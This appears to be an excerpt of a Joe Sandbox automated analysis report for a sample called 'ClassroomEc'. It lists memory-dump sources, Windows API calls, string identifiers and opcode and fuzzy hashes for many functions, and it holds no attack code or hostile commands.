                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$_wcsnicmp_wtol
                                                                                                                                                              • String ID: GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete
                                                                                                                                                              • API String ID: 24125944-3877767935
                                                                                                                                                              • Opcode ID: 1a39d6bb14392dae76e5752af9d3a417db2d9f05d5a32e113095d8b1183cc137
                                                                                                                                                              • Instruction ID: 3f5aa726dafa184141cef95b7afd6c06b5187ae3e9f2471405e33ca445e40e44
                                                                                                                                                              • Opcode Fuzzy Hash: 1a39d6bb14392dae76e5752af9d3a417db2d9f05d5a32e113095d8b1183cc137
                                                                                                                                                              • Instruction Fuzzy Hash: 69B18178A00018EBCB14EB98C99297DB3B2EF81745B2C8189F442EB281E771DE55E775
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D6AE39
                                                                                                                                                              • wsprintfW.USER32 ref: 00D6AE8C
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6AECF
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6AEF3
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap$Unothrow_t@std@@@__ehfuncinfo$??2@_wmemmovewsprintf
                                                                                                                                                              • String ID: %d%%$0u
                                                                                                                                                              • API String ID: 3297093599-3442222605
                                                                                                                                                              • Opcode ID: 61f40f7a00ca7ee8615345d5424dc3e5b502fc9fbe2ddd4f0ca18b7eba4c9cc7
                                                                                                                                                              • Instruction ID: bbb106e36d45e0653c511501f8be579404e7a8418d948c727021586425926100
                                                                                                                                                              • Opcode Fuzzy Hash: 61f40f7a00ca7ee8615345d5424dc3e5b502fc9fbe2ddd4f0ca18b7eba4c9cc7
                                                                                                                                                              • Instruction Fuzzy Hash: 78312A71E10208ABDB04EB98DC96EEDB379EB48304F248159F115BB292DB71BD05CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00D6A6CA
                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00D6A6F4
                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D6A725
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6A73B
                                                                                                                                                              • SHGetMalloc.SHELL32(00000000), ref: 00D6A75C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorBrowseDebugFolderFromHeapListMallocPathmemset
                                                                                                                                                              • String ID: A
                                                                                                                                                              • API String ID: 1414482492-3554254475
                                                                                                                                                              • Opcode ID: 53da9470b0c37777d057187746e6165c9bd209b0f12c0cb6415655675cc0b1c1
                                                                                                                                                              • Instruction ID: 637c619eb959b0b9144027d1aabdddd88c3f26584440d6f2d175515d21589766
                                                                                                                                                              • Opcode Fuzzy Hash: 53da9470b0c37777d057187746e6165c9bd209b0f12c0cb6415655675cc0b1c1
                                                                                                                                                              • Instruction Fuzzy Hash: 7A21C97095021D9BCB24EB54DC8CBD9B3B9AF58300F1441D9E50DA72A0DB749E84CFA2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D87ED4
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00D87EE0
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00D87EE8
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00D87EF0
                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00D87EFC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                              • String ID: qld]
                                                                                                                                                              • API String ID: 1445889803-2806098251
                                                                                                                                                              • Opcode ID: d83ebb74cba82f89629c716cb3f23246d73c49f2275475c6220b162638ba74c4
                                                                                                                                                              • Instruction ID: 780875fed428a9620859b1a3afdd89691ef06dc83d6950ef8f0e3442f1c6ad54
                                                                                                                                                              • Opcode Fuzzy Hash: d83ebb74cba82f89629c716cb3f23246d73c49f2275475c6220b162638ba74c4
                                                                                                                                                              • Instruction Fuzzy Hash: 25015E72D24315ABCB11ABB9EC4C5AAF7F8EB48355F5A4561E901E7354D7309D008BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7B40A
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7B415
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7B420
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7B42B
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7B436
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7B441
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3936482309-0
                                                                                                                                                              • Opcode ID: eec72d98b234a6a65ae9d72163ffa9feb1c6c3b5cdcfe611574be4fde77e45ee
                                                                                                                                                              • Instruction ID: 238840205fbc384f80e80fb29bcebd7943d0f85245944928e1d31cb9b55a25dc
                                                                                                                                                              • Opcode Fuzzy Hash: eec72d98b234a6a65ae9d72163ffa9feb1c6c3b5cdcfe611574be4fde77e45ee
                                                                                                                                                              • Instruction Fuzzy Hash: 11210E74A04108EFDB04EF98C665B9EB7B1EF44308F648198D5056B342CB75AF01DBB6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D65885
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                                • Part of subcall function 00D79270: _wmemmove.LIBCMTD ref: 00D792A5
                                                                                                                                                                • Part of subcall function 00D704F0: ??3@YAXPAX@Z.MSVCRT ref: 00D70505
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D658C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap_wmemmove$??3@
                                                                                                                                                              • String ID: %%T$%%T/$%%T\
                                                                                                                                                              • API String ID: 3527340311-3604420949
                                                                                                                                                              • Opcode ID: bc06b9687964f9b4dc42c1095e70f1522071812133d60bb68c314868f0505b8b
                                                                                                                                                              • Instruction ID: 318bcad3757a911de2905b64eec109baaf13b0c9a737a401b79d43b4376d21ae
                                                                                                                                                              • Opcode Fuzzy Hash: bc06b9687964f9b4dc42c1095e70f1522071812133d60bb68c314868f0505b8b
                                                                                                                                                              • Instruction Fuzzy Hash: 6F119676960008BBCB08FB94DCA2CEDF778EE54704F54C158B61A66192FF706A09CBB4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D65A05
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                                • Part of subcall function 00D79270: _wmemmove.LIBCMTD ref: 00D792A5
                                                                                                                                                                • Part of subcall function 00D704F0: ??3@YAXPAX@Z.MSVCRT ref: 00D70505
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D65A43
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap_wmemmove$??3@
                                                                                                                                                              • String ID: %%M$%%M/$%%M\
                                                                                                                                                              • API String ID: 3527340311-1781175070
                                                                                                                                                              • Opcode ID: b85b8da8ec0e96600bf5859444c4a139c27067623149170753498fe89262b90d
                                                                                                                                                              • Instruction ID: ff6675a2758055be92319208a93d64116d54b7cc825f644a34c3c6dcb5bae10b
                                                                                                                                                              • Opcode Fuzzy Hash: b85b8da8ec0e96600bf5859444c4a139c27067623149170753498fe89262b90d
                                                                                                                                                              • Instruction Fuzzy Hash: 3A11AA76960008BBCB08FB94DCA2CEDF778EE54704F54C158B51A66191FF706A49CBB4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D65945
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                                • Part of subcall function 00D79270: _wmemmove.LIBCMTD ref: 00D792A5
                                                                                                                                                                • Part of subcall function 00D704F0: ??3@YAXPAX@Z.MSVCRT ref: 00D70505
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D65983
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap_wmemmove$??3@
                                                                                                                                                              • String ID: %%S$%%S/$%%S\
                                                                                                                                                              • API String ID: 3527340311-1963631775
                                                                                                                                                              • Opcode ID: 6710ffe31e2e57a925375bf281664a23e8be43e0a85ad552f8ca0398ae6be902
                                                                                                                                                              • Instruction ID: fca53be6490438c8c4e59ad1bae0da2f41590c249220fde4b7147709c7dc3b0d
                                                                                                                                                              • Opcode Fuzzy Hash: 6710ffe31e2e57a925375bf281664a23e8be43e0a85ad552f8ca0398ae6be902
                                                                                                                                                              • Instruction Fuzzy Hash: 8411AA36960009BBCB08FBA4DCA2CEDF778EE54704F54C158B51A66191FF706A09CBB4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: &
                                                                                                                                                              • API String ID: 2221118986-1010288
                                                                                                                                                              • Opcode ID: 4a134deadddd27b75c2f87929b85d2cbcd596e30c9a30e45e571e3856727e1f5
                                                                                                                                                              • Instruction ID: cd938979337e5cad97be3b221e4b39a6303a1be609aa53483aacddcb92b2868c
                                                                                                                                                              • Opcode Fuzzy Hash: 4a134deadddd27b75c2f87929b85d2cbcd596e30c9a30e45e571e3856727e1f5
                                                                                                                                                              • Instruction Fuzzy Hash: BF418DB0D05208EFDB04DF98C985BADBBB1FF40308F248198E9456B386D6719B40EB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D8370A
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D83715
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D83720
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D8372B
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D83736
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3936482309-0
                                                                                                                                                              • Opcode ID: 37855945f92fe7008d57c6353176db06197fcdf7bd4d5d145805dfabf7bdc565
                                                                                                                                                              • Instruction ID: 4205c1bed8c63b3999b84212853e8625bb59f25664012f3c37154d9bf068e3c6
                                                                                                                                                              • Opcode Fuzzy Hash: 37855945f92fe7008d57c6353176db06197fcdf7bd4d5d145805dfabf7bdc565
                                                                                                                                                              • Instruction Fuzzy Hash: 9A216774A04148EFDB08DF88C6A5B9EB7B1FF44308F244188E5056B342CB75AF55EBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D6B72A
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D6B735
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D6B740
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D6B74B
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D6B756
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::exception::exception
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2807920213-0
                                                                                                                                                              • Opcode ID: f8b1769de61019bb7566d5c90b2c811e35ceb3ea17b41fd2fe326901ab575d52
                                                                                                                                                              • Instruction ID: bd79d6e547695fbb663d4a14788f930da29fa47da15d330ea5a82c1d76622a87
                                                                                                                                                              • Opcode Fuzzy Hash: f8b1769de61019bb7566d5c90b2c811e35ceb3ea17b41fd2fe326901ab575d52
                                                                                                                                                              • Instruction Fuzzy Hash: B7E0F530E05108EB8B0CFB99E966A6DB376DF84344B140599E40667342CE356F10EAB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D69240: GetSystemMetrics.USER32(0000000B), ref: 00D69289
                                                                                                                                                                • Part of subcall function 00D69240: GetSystemMetrics.USER32(0000000C), ref: 00D6929B
                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00D6ABA3
                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00D6ABBB
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6ABD9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem$AllocatorDebugHeap
                                                                                                                                                              • String ID: 100%%
                                                                                                                                                              • API String ID: 1530364085-568723177
                                                                                                                                                              • Opcode ID: a7fa9549379ad13071887fb6636f9f93a60100230373917c9976d125e220824c
                                                                                                                                                              • Instruction ID: b292c6d1df33c79c4d38170d5842c5b36a38721fbd745626ef4b311339a93bc7
                                                                                                                                                              • Opcode Fuzzy Hash: a7fa9549379ad13071887fb6636f9f93a60100230373917c9976d125e220824c
                                                                                                                                                              • Instruction Fuzzy Hash: 5551A635A002098FCB08DF98C9919ADBBB6EB98324F285159D505BB395DB30ED81CFB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SystemParametersInfoW.USER32(00000029,000001F4,000001F4,00000000), ref: 00D69163
                                                                                                                                                              • GetSystemMetrics.USER32(00000031), ref: 00D6919A
                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00D691B3
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00D69213
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1900162674-0
                                                                                                                                                              • Opcode ID: bad5da075d77228606eeefde7f8eb0a17834676c7d253db43afa2d76b79f33a2
                                                                                                                                                              • Instruction ID: a66f3ac548980deefc1d76c20a1226e0c0dd98f84a70aa4e1b69d8a2799f2ca1
                                                                                                                                                              • Opcode Fuzzy Hash: bad5da075d77228606eeefde7f8eb0a17834676c7d253db43afa2d76b79f33a2
                                                                                                                                                              • Instruction Fuzzy Hash: A331D8B498021E9FDB24DF54C898BE9B7B4BB58304F0442D9A919A7391CB709E84CFA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D697C0: GetDlgItem.USER32(00000000,?), ref: 00D697D8
                                                                                                                                                                • Part of subcall function 00D69890: ShowWindow.USER32(00000000,?,000004B2), ref: 00D698CA
                                                                                                                                                              • memset.MSVCRT ref: 00D6A2FA
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D6A30E
                                                                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00D6A32E
                                                                                                                                                                • Part of subcall function 00D68A60: GetDlgItem.USER32(?,00000000), ref: 00D68A72
                                                                                                                                                              • SetWindowLongW.USER32(00000000,000004B7,000000FC), ref: 00D6A35B
                                                                                                                                                                • Part of subcall function 00D693F0: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00D69410
                                                                                                                                                                • Part of subcall function 00D693F0: LoadIconW.USER32(00000000), ref: 00D69417
                                                                                                                                                                • Part of subcall function 00D693F0: GetSystemMetrics.USER32(00000032), ref: 00D69424
                                                                                                                                                                • Part of subcall function 00D693F0: GetSystemMetrics.USER32(00000031), ref: 00D6942D
                                                                                                                                                                • Part of subcall function 00D693F0: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00D6943A
                                                                                                                                                                • Part of subcall function 00D693F0: LoadImageW.USER32(00000000), ref: 00D69441
                                                                                                                                                                • Part of subcall function 00D693F0: GetWindowLongW.USER32(00000000,000004B2), ref: 00D6949A
                                                                                                                                                                • Part of subcall function 00D693F0: SetWindowLongW.USER32(00000000,000004B2,000000F0), ref: 00D694B6
                                                                                                                                                                • Part of subcall function 00D693F0: GetWindowLongW.USER32(00000000,000004B5), ref: 00D694CC
                                                                                                                                                                • Part of subcall function 00D693F0: SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00D694E8
                                                                                                                                                                • Part of subcall function 00D6A5F0: SetFocus.USER32(00000000,000004B6,?,?,00D6A386), ref: 00D6A605
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
